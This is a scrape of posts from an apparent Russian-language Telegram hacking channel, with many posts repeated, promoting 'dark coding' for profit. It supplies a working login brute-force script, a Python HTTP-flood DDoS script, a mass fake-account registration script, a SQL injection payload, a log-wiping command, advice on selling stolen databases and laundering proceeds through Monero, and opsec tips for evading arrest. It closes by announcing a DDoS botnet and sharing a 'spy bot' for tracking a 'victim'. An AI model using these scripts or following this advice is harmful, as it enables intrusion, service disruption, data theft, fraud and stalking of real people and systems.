Методология: не атака, а процесс
Настоящий взлом — это алгоритм, повторяемый раз за разом:
1. Разведка (Reconnaissance): Сбор информации о цели. Открытые порты, запущенные службы, версии ПО.
2. Сканирование уязвимостей: Автоматизированный поиск известных дыр в найденном софте (Nessus, OpenVAS).
3. Получение доступа (Exploitation): Использование уязвимости для запуска своего кода. Это тот самый «взлом».
4. Закрепление (Persistence): Обеспечение возврата в систему, даже если её перезагрузят.
5. Сокрытие следов (Covering Tracks): Очистка логов.
Правда, которую не расскажут:
· 90% успеха — скучная автоматизация. Написание скрипта, который переберёт 1000 комбинаций, важнее «гениальной догадки».
· Главный враг — время. На поиск одной уязвимости у профессионалов уходят недели.
· Это легально, пока ты атакуешь свои полигоны или получаешь письменное разрешение (Bug Bounty). Один неверный шаг в реальную систему — и ст. 272 УК РФ становится твоей спутницей.
Вывод:
Обучение взлому — это не про «взломать». Это про понимание, как что-то устроено, чтобы найти в этом слабое место. Это про усидчивость, а не про крутой взлом. Начни с основ сетей и командной строки. Всё остальное — лишь инструменты в руках того, кто знает фундамент.
Запомни, если решаешь делать что-то незаконное то помни "от правительства не скрыватся всегда, рано или поздно найдут"
В следующем посте будет интересное обучение
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Если ты ждешь инструкцию «как взломать ВК за 5 минут», закрой статью. Реальный взлом — это не кнопка. Это скучное, долгое ремесло. Вот из чего на самом деле состоит «обучение».
Фундамент: то, без чего ты ноль
1. Сети: Как движутся пакеты. TCP/IP, DNS, HTTP/S, прокси. Без этого ты слепой.
2. Операционные системы (Linux): Командная строка — твой главный инструмент. Умение жить в терминале Kali или Parrot OS.
3. Языки: Не нужно знать десять. Нужно понимать:
· Python/Bash — для автоматизации скучной работы (перебор, сканирование).
· SQL — чтобы понимать, как ломаются базы данных.
· Основы HTML/JS — чтобы видеть дыры в вебе.
Полигон: где режут кошек
Тебе нужна легальная среда, где можно бить, не попадая под статью.
· Хакатоны и CTF (Capture The Flag): Игровые площадки с задачами на поиск уязвимостей. Примеры: HackTheBox, TryHackMe, OverTheWire.
· Лаборатории: Виртуальные машины с преднамеренно уязвимым софтом (Metasploitable, DVWA).
Методология: не атака, а процесс
Настоящий взлом — это алгоритм, повторяемый раз за разом:
1. Разведка (Reconnaissance): Сбор информации о цели. Открытые порты, запущенные службы, версии ПО.
2. Сканирование уязвимостей: Автоматизированный поиск известных дыр в найденном софте (Nessus, OpenVAS).
3. Получение доступа (Exploitation): Использование уязвимости для запуска своего кода. Это тот самый «взлом».
4. Закрепление (Persistence): Обеспечение возврата в систему, даже если её перезагрузят.
5. Сокрытие следов (Covering Tracks): Очистка логов.
Правда, которую не расскажут:
· 90% успеха — скучная автоматизация. Написание скрипта, который переберёт 1000 комбинаций, важнее «гениальной догадки».
· Главный враг — время. На поиск одной уязвимости у профессионалов уходят недели.
· Это легально, пока ты атакуешь свои полигоны или получаешь письменное разрешение (Bug Bounty). Один неверный шаг в реальную систему — и ст. 272 УК РФ становится твоей спутницей.
Вывод:
Обучение взлому — это не про «взломать». Это про понимание, как что-то устроено, чтобы найти в этом слабое место. Это про усидчивость, а не про крутой взлом. Начни с основ сетей и командной строки. Всё остальное — лишь инструменты в руках того, кто знает фундамент.
Запомни, если решаешь делать что-то незаконное то помни "от правительства не скрыватся всегда, рано или поздно найдут"
В следующем посте будет интересное обучение
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
БЫСТРЫЙ СТАРТ В ТЕМНЫЙ КОДИНГ
1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:
· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.
2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ
· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.
3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)
· Telegram: @blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums, XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.
4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)
5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД
· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.
6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)
· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.
7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)
· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*
8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.
СТАРТУЙ СЕЙЧАС:
1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).
ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.
в следующем посте будет небольшая статья о том как правильно и безопастно писать софты
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:
· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.
2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ
· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.
3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)
· Telegram: @blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums, XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.
4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)
import requests
import threading
target_url = "http://target.com/login"
usernames = ["admin", "user", "root"]
passwords = ["123456", "password", "admin"]
def brute(user, pwd):
data = {"login": user, "password": pwd}
r = requests.post(target_url, data=data)
if "error" not in r.text.lower():
print(f"[+] ВЗЛОМАНО: {user}:{pwd}")
with open("hacked.txt", "a") as f:
f.write(f"{user}:{pwd}\n")
for u in usernames:
for p in passwords:
threading.Thread(target=brute, args=(u, p)).start()5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД
· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.
6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)
· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.
7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)
· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*
8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.
СТАРТУЙ СЕЙЧАС:
1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).
ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.
в следующем посте будет небольшая статья о том как правильно и безопастно писать софты
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Чёрный софт: дд0s, автоматизация атак и поиск утечек
ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!
1. дд0s-СОФТ (ПРИНЦИП)
Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.
Код-скелет на Python (HTTP-flood):
Усложнение или же для вашего блага:
· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)
Готовые решения (в д@рkнeтe):
· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)
2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ
Концепция: Имитация человека для массовых операций.
Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):
from selenium import webdriver
import random, string
def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "@gmail.com"
driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:
· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)
3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ
Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.
Ключевые методы:
А. Мониторинг даркнет-форумов и чатов (Telegram-бот):
import telethon, re, sqlite3
client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')
@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):
import requests, re
sites = ["pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):
import hashlib, re
def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))
# Проверка своих данных в утечке
my_creds = ["my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:
· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
· Intelx.io (поиск по индексам)
Технические фишки:
1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа @leakbase, @databreach.
ЗАЩИТА:
· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!
1. дд0s-СОФТ (ПРИНЦИП)
Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.
Код-скелет на Python (HTTP-flood):
import threading
import requests
target_url = "http://target.com"
threads = 500
def attack():
while True:
try:
requests.get(target_url, timeout=3)
except:
pass
for i in range(threads):
thread = threading.Thread(target=attack)
thread.daemon = True
thread.start()
while True: pass # Бесконечная атакаУсложнение или же для вашего блага:
· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)
Готовые решения (в д@рkнeтe):
· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)
2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ
Концепция: Имитация человека для массовых операций.
Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):
from selenium import webdriver
import random, string
def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "@gmail.com"
driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:
· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)
3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ
Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.
Ключевые методы:
А. Мониторинг даркнет-форумов и чатов (Telegram-бот):
import telethon, re, sqlite3
client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')
@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):
import requests, re
sites = ["pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):
import hashlib, re
def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))
# Проверка своих данных в утечке
my_creds = ["my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:
· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
· Intelx.io (поиск по индексам)
Технические фишки:
1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа @leakbase, @databreach.
ЗАЩИТА:
· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
Итог: Такой софт — просто автоматизация рутинных действий. Реальная опасность — в масштабе, который он позволяет достичь: тысячи атак в минуту, мониторинг сотен источников утечек одновременно. Защита должна быть такой же автоматизированной.
в следующей статью напишу как на самом деле сливают бд
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
в следующей статью напишу как на самом деле сливают бд
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Как на самом деле сливают базы данных?
от SQL-инъекции до внутренней утечки
Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.
1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)
· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно
2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ
А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.
' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.
Б. Открытые порты и пароли по умолчанию:
· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.
В. Уязвимости в ПО:
· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.
3. АТАКИ НА БЭКАПЫ
· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql, dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.
4. ФИШИНГ ДЛЯ АДМИНОВ
1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.
5. ПРОДАЖА "ИЗНУТРИ"
Схема работы на теневом форуме:
[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):
1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.
Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.
в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
от SQL-инъекции до внутренней утечки
Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.
1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)
· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно
2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ
А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.
' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.
Б. Открытые порты и пароли по умолчанию:
· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.
В. Уязвимости в ПО:
· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.
3. АТАКИ НА БЭКАПЫ
· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql, dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.
4. ФИШИНГ ДЛЯ АДМИНОВ
1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.
5. ПРОДАЖА "ИЗНУТРИ"
Схема работы на теневом форуме:
[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):
1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.
Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.
в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
CSINT с нуля: как научиться киберразведке
че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.
1. БАЗА: БЕЗ НЕЁ НИКУДА
· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.
2. ИНСТРУМЕНТАРИЙ
Пассивная разведка:
· Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
· Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.
Активные методы (осторожно, могут оставлять следы):
· Nmap — сканирование портов. Базовый скрипт:
· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).
3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)
Где искать:
· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)
Как анализировать:
1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.
Пример команды для анализа дампа:
4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ
Инструменты:
· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.
Что можно найти:
· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО
5. АВТОМАТИЗАЦИЯ НА PYTHON
Скрипт мониторинга новых утечек в Telegram:
6. ПОЛЕЗНЫЕ НАВЫКИ
· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).
7. ГДЕ ТРЕНИРОВАТЬСЯ
· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».
8. ЭТИКА И ЗАКОН
CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.
Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.
Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.
1. БАЗА: БЕЗ НЕЁ НИКУДА
· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.
2. ИНСТРУМЕНТАРИЙ
Пассивная разведка:
· Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
· Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.
Активные методы (осторожно, могут оставлять следы):
· Nmap — сканирование портов. Базовый скрипт:
nmap -sV -O -p 1-1000 target.com
· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).
3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)
Где искать:
· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)
Как анализировать:
1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.
Пример команды для анализа дампа:
# Поиск всех записей с доменом gmail.com
grep -i "@gmail.com" leaked_dump.txt | head -20
# Поиск конкретного логина
grep "username123" leaked_dump.txt
# Извлечение только паролей
awk -F: '{print $2}' leaked_dump.txt | sort | uniq
4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ
Инструменты:
· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.
Что можно найти:
· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО
5. АВТОМАТИЗАЦИЯ НА PYTHON
Скрипт мониторинга новых утечек в Telegram:
from telethon import TelegramClient, events
api_id = YOUR_ID
api_hash = 'YOUR_HASH'
client = TelegramClient('session', api_id, api_hash)
@client.on(events.NewMessage(chats=('leakbase')))
async def handler(event):
if 'dump' in event.message.text.lower():
print(f'Новая утечка: {event.message.text}')
# Автосохранение или парсинг
client.start()
client.run_until_disconnected()
6. ПОЛЕЗНЫЕ НАВЫКИ
· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).
7. ГДЕ ТРЕНИРОВАТЬСЯ
· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».
8. ЭТИКА И ЗАКОН
CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.
Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.
Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Forwarded from Pepe faa (шансон TXX)
я буду делать dd#s ботнет делать...
простеньким - ❤️
полноценный ботнет - 👍
простеньким - ❤️
полноценный ботнет - 👍
❤2👍1
Pepe faa
я буду делать dd#s ботнет делать... простеньким - ❤️ полноценный ботнет - 👍
впринцепи готово, завтра буду тестить
20 - ❤️
и 40 сабов добиваем и я сливаю
кодинг с шансом 👇
@CodingChans
20 - ❤️
и 40 сабов добиваем и я сливаю
кодинг с шансом 👇
@CodingChans
TG_shpion @CodingChans.zip
134.6 KB
ловите бота-шпиона, который будет вам показывать когда ваша жертва в сети и когда вышла.
как запустить?
мне лень просто писать было много ну вроде понятно объяснил
кодинг с шансом 👇
@CodingChans
как запустить?
1. Распакуйте файл где удобно
2. Откройте консоль (Win+R, в окошке ввести cmd)
3. Напишите в терминал "cd [путь к папке]"
4. Изменяем в файле TG_shpion...... все под себя
5. Устанавливаем зависимости:
pip install -R requirements.txt
6. Запустите: python shpion.py
На Android
1. сделайте тот же самый первый пункт (выше)
2. Откройте Termux
3. тот же 3 пункт (выше)
4. сделайте как в 5 пункте (выше)
5. Повторите как в 6 пункте
мне лень просто писать было много ну вроде понятно объяснил
кодинг с шансом 👇
@CodingChans
Forwarded from Эксельру Шинигами 🏴☠️
Та стои он меня за догсит